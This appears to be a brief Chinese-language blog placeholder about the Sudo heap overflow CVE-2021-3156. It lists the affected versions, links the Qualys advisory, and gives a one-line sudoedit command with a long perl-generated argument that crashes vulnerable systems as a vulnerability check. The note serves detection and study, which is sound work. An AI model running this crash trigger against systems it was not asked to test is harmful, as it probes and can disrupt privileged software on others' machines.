Heap-based buffer overflow in Sudo (CVE-2021-3156)
由于sudo
转义\
不当而造成的堆溢出漏洞,LPE
从1.8.2到1.8.31p2的所有版本
从1.9.0到1.9.5p1的所有稳定版本
sudoedit -s '\' `perl -e 'print "A" x 65536'
如果出现类似Segmentation fault (core dumped)
即表明存在漏洞
https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
先占个坑,正在调试分析中,等分析完写完blog贴链接